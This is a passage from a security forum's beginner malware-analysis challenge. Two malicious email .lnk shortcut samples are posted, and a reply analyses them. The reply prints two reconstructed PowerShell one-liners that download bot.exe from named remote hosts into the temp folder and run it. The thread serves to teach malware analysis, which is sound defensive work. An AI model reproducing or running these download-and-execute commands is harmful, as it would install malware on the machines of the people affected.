Author Topic: [Beginner Challenge] LNK Samples  (Read 843 times)

0 Members and 1 Guest are viewing this topic.

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
[Beginner Challenge] LNK Samples
« on: January 25, 2016, 01:35:58 pm »
Both samples are from the same malware family and arrived via email attachment. Typical file names are Dokument_8979121242.doc.lnk or DHL_id_162723593211.doc.lnk.
Feel free to analyse them and tell us anything you found out.

These archives contain live malware!

7f5a31266205a20b4e1248b4b62b0cf7471c8c2f64159f3c50846e5fffbd9e9a.zip

55e81b0dfa1fd8e841f57b2b64e153cf2e93bed58dac2eaa7c81436ff250f56e.zip

The password is "infected".
« Last Edit: January 25, 2016, 01:36:20 pm by Deque »

Offline Psycho_Coder

  • Knight
  • **
  • Posts: 166
  • Cookies: 84
  • Programmer, Forensic Analyst
    • View Profile
    • Code Hackers Blog
Re: [Beginner Challenge] LNK Samples
« Reply #1 on: January 26, 2016, 08:55:37 pm »
Analysis for file 7f5a*.lnk

Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Sun, 25 Oct 2015 20:40:10 GMT
Last Modified Date: Sun, 25 Oct 2015 20:40:10 GMT

Comments:

The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and pass arguments to it to download a file and save it in the temp folder as a.exe and followed by running the newly saved application. The file tries to download a file from the url hxxp :// goodvin77787.in/bot . exe, now taking into consideration the extension, it appears to be a PE file but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:-

Code: [Select]
(new-object System.Net.WebClient).DownloadFile('http://goodvin77787.in/bot.exe','%TEMP%\a.exe');Start-Process "%TEMP%\a.exe

Moreover the process window show command value was found to be: SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process a.exe is iconified and the icon is taken from SHELL32.DLL, and the Icon index being 54 and the dimension being 24x24.



Analysis for file 55e8*.lnk

Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Thu, 29 Oct 2015 04:37:08 GMT
Last Modified Date: Thu, 29 Oct 2015 04:37:08 GMT

Comments:

The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and pass arguments to it to download a file and save it in the temp folder as z.exe and followed by running the newly saved application. The file tries to download a file from the url hxxp :// goodprice28.pw/bot . exe, now taking into consideration the extension, it appears to be a PE file but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:-

Code: [Select]
(new-object System.Net.WebClient).DownloadFile('http://goodprice28.pw/bot.exe','%TEMP%\z.exe');Start-Process "%TEMP%\z.exe

Moreover the process window show command value was found to be: SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process z.exe is iconified and the icon is taken from SHELL32.DLL, and the Icon index being 70 and the dimension being 24x24.


I am not writing any specific conclusion since I am not able to directly examine the bot.exe files and see their effect. I hope this much is fine. Let me know where I messed up, I wold also like to know if anything specific can be deduced from SID that is present in both files.

Edit: Made malicious links unclickable -Deque
« Last Edit: January 27, 2016, 11:13:10 am by Deque »
"Don't do anything by half. If you love someone, love them with all your soul. When you hate someone, hate them until it hurts."--- Henry Rollins

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • *
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
    • View Profile
Re: [Beginner Challenge] LNK Samples
« Reply #2 on: January 27, 2016, 01:54:09 pm »
This is a very detailed analysis. I couldn't have done it better.
PS: Please disarm any malware download links in the future. Even if they are not working anymore. ;)

Offline Psycho_Coder

  • Knight
  • **
  • Posts: 166
  • Cookies: 84
  • Programmer, Forensic Analyst
    • View Profile
    • Code Hackers Blog
Re: [Beginner Challenge] LNK Samples
« Reply #3 on: January 27, 2016, 03:56:19 pm »
This is a very detailed analysis. I couldn't have done it better.
PS: Please disarm any malware download links in the future. Even if they are not working anymore. ;)

Thanks. Sorry about the links, I will remember it from now onwards.
"Don't do anything by half. If you love someone, love them with all your soul. When you hate someone, hate them until it hurts."--- Henry Rollins